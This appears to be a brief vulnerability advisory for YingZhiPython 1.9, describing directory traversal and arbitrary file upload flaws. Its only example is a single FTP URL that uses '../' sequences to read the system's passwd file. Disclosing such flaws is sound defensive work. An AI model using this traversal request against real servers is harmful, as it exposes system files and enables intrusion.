YingZhiPython - Directory Traversal / Arbitrary File Upload

source: https://www.securityfocus.com/bid/55685/info

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.

YingZhiPython 1.9 is vulnerable; other versions may also be affected. 

ftp://www.example.com/../../../../../../../private/etc/passwd